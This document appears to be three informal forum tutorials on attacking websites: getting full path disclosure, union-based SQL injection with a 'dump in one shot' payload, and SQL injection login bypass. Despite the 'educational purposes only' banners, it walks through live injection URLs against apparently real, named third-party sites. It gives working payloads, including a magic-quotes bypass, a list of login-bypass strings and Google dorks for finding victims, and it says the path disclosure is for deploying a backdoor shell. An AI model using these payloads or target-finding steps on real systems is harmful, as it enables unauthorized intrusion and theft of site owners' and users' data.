Getting Full Path Disclosure (FPD)

!! FOR EDUCATIONAL PURPOSES ONLY !!
I Introduction
Today i'm gonna teach you how to get the full path disclosure also known ass FPD

II Learning Basics
What is fpd?
FPD or Full Path Disclosure is an internal path structure of installation.
Example:
/home/www/htdocs/

Why attackers need fpd sometimes?
Attackers need it because they need the full path disclosure to deploy their backdoor shell.
This is very needed for uploading shell in sql injection, INTO OUTFILE
Example you visit the url www.website.com/index.php
in internal path, its /home/www/htdocs/index.php

III Getting Full Path Disclosure
1) Using Error.
in SQL Injection, you can already get the FPD if the error_reporting is enabled.
http://jornaldacidadearuja.com.br/guia/det.php?id=19'
If you see the error
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/jornaldacidade/public_html/site/include/mysql.inc.php on line 142
You already got the FPD, Ez.

2) Using empty array
example this is the page
www.website.com/page=about
Lets make the variable page an empty array
www.website.com/page[]=about

So after doing it, you'll see an error if the error_reporting is enabled.

Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84 Warning: pg_num_rows(): supplied argument … in /usr/home/example/html/pie/index.php on line 131

3) Google Dorks

You can use google dorks to find the FPD of the website,

example dork:

Warning: * [function.*]: site:www.website.com

Or you can use dork to use this dork

ip:xxx.xxx.xxx.xx * [function.*]:

You can make your own dork if you want

IV Goodbye

So that's all for now, hope you enjoy my post if you have some question or feedback please feel free to say it in comment!

Union Based DIOS (Dump In One Shot) SQL Injection

!! FOR EDUCATION PURPOSES ONLY !!

I Introduction
Hey guys! today i'm gonna teach you how to DIOS in union based SQL Injection

II Learning Basics
So here we go again you need to learn the basics. Ofcourse you already knew it i just want to repeat lol.

1)Google dorks
what is google dorks? 
Google dorks are used for easier searching like "inurl" "intext" like that

why do we need that?
No we really dont need that, Just kidding ofcourse we need that to get target websites!

how do we use it?
so for example go to google and search: " inurl:news.php?id= "
you'll see the results like www.website.com/news.php?id=5

II Finding target
google : " inurl:news.php?id= "
You can do your own google dork if you want, the common dorks is

inurl:page.php?id=19
inurl:gallery.php?id=19
inurl:view.php?id=19
inurl:article.php?id=19
inurl:buy.php?id=19

so get some target and lets start.

III Checking if vulnerable to SQL Injection
After getting a website target, we will now check if its vulnerable to SQL injection or not.
example this is my target : http://jornaldacidadearuja.com.br/guia/det.php?id=19

You'll add a colon " ' " to the end of the number
http://jornaldacidadearuja.com.br/guia/det.php?id=19'

now if you see an errored text or lookes like the page doesnt look normal, then theres a chance that its vulnerable to SQL injection
but if the page loads normally, too bad. Its not vulnerable.

What to do if its not vulnerable?
ofcourse find another website xD

IV Counting vulnerable columns
After you find it vulnerable to SQL injection, its time to count the columns using the order by.
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 1--
increase the number 1 until you you get an error

http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 1-- ("No error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 2-- ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 10--("No error?!")
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 100000--("No error?!!")

So if that things happen you got in 99999 and still no error.
that means the ID is a string, not integer.

So how we will fix it?
Just simply add " ' " after the start and add " + " in the end.
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 1--+

Start:
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 10--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 20--+ ("ERROR")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 15--+ ("no error")http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 16--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 17--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 18--+ ("no error")http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 19--+ ("Error!!!!")

There we go! we know that there is 18 columns. Now we will check now what is the injectable column!

V Getting injectable column
Now we knew there is 18 columns, we will now get the injectable column
Our payload will be " and false union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 "
so the url will be http://jornaldacidadearuja.com.br/guia/det.php?id=19' and false union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+
Heyy! Column 6 is injectable column

VI DIOS ( Dump In One Shot )
Our payload for Dump In One Shot is (select (@a) from (select(@a:=0x00),(@tbl:=0x00),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,table_schema,' :: ',@tbl:=table_name,' ',column_name), (column_name))))))a)
And wolah! dumped in one shot!

VII Magic Quotes enabled
If it didn't worked for you then lets say the magic quotes enabled.
What is magic quote?
magic quote is replace the " ' " to " \' "
How to bypass it?
Its easy. Just hex those stringed texts. The payload will be
(select(@a) from (select(@a:=0x00),(@tbl:=0x00),(select (@a) from (information_schema.columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,table_schema,0x203a3a20,@tbl:=table_name,0x20,column_name), (column_name))))))a)

VIII Goodbye
So hope you learned something in this tutorial, if you have some questions and feedback please feel free to comment!

SQL Injection Login Bypass

!! FOR EDUCATION PURPOSES ONLY !!
I Introduction
Today i'm gonna teach you how to bypass the login panel using SQL Injection.

II Learning Basics
1) Google Dorks
what is google dorks? Google dorks are used for easier searching like "inurl" "intext" like that

why do we need that?
No we really dont need that, Just kidding ofcourse we need that to get target websites!

how do we use it?
so for example go to google and search: " inurl:login.php "
you'll see the results like www.website.com/login.php

2)SQL
Structured Query Language(SQL) is a special-purpose programming language designed for managing data held in a relational database management system.
Reference? ofcourse wikipedia

3)SQL injection
SQL injection is kind of attack that has malicious code inserted into sql statements to drop,update,add,view etc a database

III Finding target
After learning some basics, we will now get a target using google dorks,
Examples of google dorks:
inurl:login.php
inurl:admin.php
inurl:administrator.php
inurl:admin_login.php

IV Bypass Login
So after fnding a target, we will now try to bypass it
example this is our target
http://www.voteforgoodleader.com/h/launch.php?m=home&sm=acc&l=en
Try logging in using " a' or '1'='1 " (without quotes) for password and email.
And bam! we successfully bypassed the login!

Why?
Example this is the query

select username,pass from users where username='a' or '1'='1' and password='a' or '1'='1' limit 0,1;

the or '1'='1'  will make the statement true no matter what.

V Extras
If the " a' or '1'='1 " didin't work you can use some of this
a' or true--
a' or 1=1--
a') or true--
a' or 1=1#
a) or ('')=('

VI Goodbye
That's all for now hope you enjoyed my tutorial! If you have some feedbacks or question please feel free to comment.